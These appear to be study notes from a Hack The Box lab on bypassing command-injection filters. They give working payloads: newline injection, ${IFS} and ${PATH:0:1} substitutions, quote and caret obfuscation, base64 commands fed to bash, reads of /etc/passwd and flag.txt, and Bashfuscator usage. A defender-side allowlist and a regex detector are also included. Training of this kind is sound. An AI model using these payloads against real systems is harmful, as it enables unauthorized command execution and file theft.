Filter Evasion

Filter/WAF Detection

We can see that if we try the previous operators we tested, like (;, &&, ||), we get the error message invalid input:

If the error message displayed a different page, with information like our IP and our request, this may indicate that it was denied by a WAF.

127.0.0.1; whoami

Identifying Blacklisted Characters

We know that the (127.0.0.1) payload does work, so let us start by adding the semi-colon (127.0.0.1;):

Bypassing Space Filters

Using Tabs

Tabs (%09) work because both Linux and Windows accept commands with tabs between arguments. So, let us try to use a tab instead of the space character (127.0.0.1%0a%09) and see if our request is accepted:

Using $IFS

Using the ($IFS) Linux Environment Variable may also work since its default value is a space and a tab. So, if we use ${IFS} where the spaces should be, the variable should be automatically replaced with a space, and our command should work.

Let us use ${IFS} and see if it works (127.0.0.1%0a${IFS}):

Using Brace Expansion

eldeim@htb[/htb]$ {ls,-la}

total 0
drwxr-xr-x 1 21y4d 21y4d   0 Jul 13 07:37 .
drwxr-xr-x 1 21y4d 21y4d   0 Jul 13 13:01 ..

Brace expansion can be applied to our command arguments in the same way, as in (127.0.0.1%0a{ls,-la}). To discover more space filter bypasses, check out the PayloadsAllTheThings page on writing commands without spaces.

Bypassing Other Blacklisted Characters

Linux

Get a slash (/):

${PATH:0:1}
  • The $PATH variable usually starts with /, e.g., /usr/local/bin:/usr/bin:/bin.

  • So ${PATH:0:1} extracts the first character, which is /.


Get a semi-colon (;):

${LS_COLORS:10:1}
  • The $LS_COLORS variable often includes formatting values like di=01;34:, and the ; appears early in the string.

  • So this substring gives you a ;.


Get a space:

${IFS}
  • ${IFS} stands for Internal Field Separator.

  • By default, this is a space in Bash.

PoCs - Questions

Use what you learned in this section to find the name of the user in the '/home' folder. What user did you find?

In this case, we first need to identify the command injection, so we try all the simple and encoded characters:

Then I can see that with the character "%0a" (== New Line == \n, without encoding) the request goes through.

Now we need to go to the /home directory; we can do it with two methods.

Method 1 - Path Traversal:

With "%0a" we can put a command, for example "ls", and it prints the current directory. We can also use other methods to do a path traversal; the objective is to build "ls ../../../home", but the backend blocks it. We can use operators:

echo ${IFS} == SPACE
echo ${PATH:0:1}
/
ip=127.0.0.1%0als${IFS}..${PATH:0:1}..${PATH:0:1}..${PATH:0:1}home

Method 2 - Command Execution

We can use a similar method with ${PWD:0:1} too:

ip=127.0.0.1%0als${IFS}-la${IFS}${PWD:0:1}home

Bypassing Blacklisted Commands

Commands Blacklist

A basic command blacklist filter in PHP would look like the following:

$blacklist = ['whoami', 'cat' /* ...SNIP... */];
foreach ($blacklist as $word) {
    // Substring match against the raw (still URL-encoded) parameter value
    if (strpos($_POST['ip'], $word) !== false) {
        echo "Invalid input";
    }
}
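As an added defender-side example (not part of these notes or the HTB module), the following Python reimplements the check so that the blacklist above is replaced by an allowlist (the whole URL-decoded parameter must parse as one IP address), and adds detection logic that flags the evasion patterns from the space-filter and blacklisted-character sections over constructed sample inputs. SAMPLE_INPUTS, EVASION_PATTERNS and the function names are my own choices.

```python
import ipaddress
import re
import urllib.parse

# Constructed sample values for the "ip" parameter, shaped like the payloads
# in these notes (not captured from any real system).
SAMPLE_INPUTS = [
    "127.0.0.1",
    "127.0.0.1%0a%09ls",
    "127.0.0.1%0als${IFS}..${PATH:0:1}home",
    "127.0.0.1%0a{ls,-la}",
    "127.0.0.1%0aw'h'o'am'i",
    "127.0.0.1%0abash<<<$(base64%09-d<<<ZmluZA==)",
]

# Indicators of the evasion tricks described above, matched AFTER URL-decoding
# so that %0a / %09 cannot hide the newline or tab from the check.
EVASION_PATTERNS = {
    "newline_or_tab": re.compile(r"[\n\t]"),
    "ifs_variable": re.compile(r"\$\{?IFS\}?"),
    "substring_expansion": re.compile(r"\$\{[A-Za-z_]+:\d+:\d+\}"),
    "brace_expansion": re.compile(r"\{[^{}]*,[^{}]*\}"),
    "quoted_command_word": re.compile(r"""\w['"]\w"""),  # w'h'o'am'i style
    "herestring": re.compile(r"<<<"),
}

def normalize(value: str) -> str:
    """URL-decode until the value stops changing, so double encoding does not help."""
    prev = None
    while prev != value:
        prev, value = value, urllib.parse.unquote(value)
    return value

def is_valid_ip(value: str) -> bool:
    """Allowlist check replacing the blacklist: the whole decoded value must be one IP."""
    try:
        ipaddress.ip_address(normalize(value))
        return True
    except ValueError:
        return False

def evasion_indicators(value: str) -> list:
    """Evasion patterns found in the decoded value (detection aid, not an input filter)."""
    decoded = normalize(value)
    return [name for name, rx in EVASION_PATTERNS.items() if rx.search(decoded)]

if __name__ == "__main__":
    for raw in SAMPLE_INPUTS:
        print(f"{raw!r:48} valid={is_valid_ip(raw)} hits={evasion_indicators(raw)}")
```

Only the first sample passes is_valid_ip; every other one fails the allowlist regardless of which separator or expansion it uses, which is the point of validating the shape of the value instead of searching it for bad words.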

Linux & Windows

If we want to obfuscate the whoami command, we can insert single quotes between its characters, as follows:

21y4d@htb[/htb]$ w'h'o'am'i
21y4d

21y4d@htb[/htb]$ w"h"o"am"i
21y4d

who$@ami
w\ho\am\i

The important things to remember are that we cannot mix types of quotes and the number of quotes must be even. We can try one of the above in our payload (127.0.0.1%0aw'h'o'am'i) and see if it works:

Windows Only

C:\htb> who^ami
21y4d

PoCs - Questions

Use what you learned in this section to find the content of flag.txt in the home folder of the user you previously found.

Using the previous techniques, we can find flag.txt in the 1nj3c70r directory:

127.0.0.1%0als${IFS}-la${IFS}..${PATH:0:1}..${PATH:0:1}..${PATH:0:1}home${PATH:0:1}1nj3c70r

Now we only need to read it:

ip=127.0.0.1%0a'c''a''t'${IFS}..${PATH:0:1}..${PATH:0:1}..${PATH:0:1}home${PATH:0:1}1nj3c70r${PATH:0:1}flag.txt

Advanced Command Obfuscation

Case Manipulation

21y4d@htb[/htb]$ $(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
21y4d
## Once we replace the spaces with tabs (%09), we see that the command works perfectly
21y4d@htb[/htb]$ $(tr%09"[A-Z]"%09"[a-z]"<<<"WhOaMi")
### Others
$(a="WhOaMi";printf %s "${a,,}")

Reversed Commands

21y4d@htb[/htb]$ $(rev<<<'imaohw')
21y4d

Encoded Commands

## First encode the command
echo -n 'cat /etc/passwd | grep 33' | base64
## Then decode it on the target and feed the result to bash (the base64 below is the output of the echo above)
bash<<<$(base64${IFS}-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

Tip: Note that we are using <<< to avoid using a pipe |, which is a filtered character.

Evasion Tools

eldeim@htb[/htb]$ git clone https://github.com/Bashfuscator/Bashfuscator
eldeim@htb[/htb]$ cd Bashfuscator
eldeim@htb[/htb]$ pip3 install setuptools==65
eldeim@htb[/htb]$ python3 setup.py install --user
eldeim@htb[/htb]$ cd ./bashfuscator/bin/
eldeim@htb[/htb]$ ./bashfuscator -h

usage: bashfuscator [-h] [-l] ...SNIP...

optional arguments:
  -h, --help            show this help message and exit

Program Options:
  -l, --list            List all the available obfuscators, compressors, and encoders
  -c COMMAND, --command COMMAND
                        Command to obfuscate
...SNIP...

We can start by simply providing the command we want to obfuscate with the -c flag:

eldeim@htb[/htb]$ ./bashfuscator -c 'cat /etc/passwd'

[+] Mutators used: Token/ForCode -> Command/Reverse
[+] Payload:
 ${*/+27\[X\(} ...SNIP...  ${*~}   
[+] Payload size: 1664 characters

PoCs - Questions

Find the output of the following command using one of the techniques you learned in this section: find /usr/share/ | grep root | grep mysql | tail -n 1

ip=127.0.0.1%0abash<<<$(base64%09-d<<<ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=)

We need to encode the payload first: echo -n 'find /usr/share/ | grep root | grep mysql | tail -n 1' | base64. Then use the malicious payload, replacing its spaces with %09.
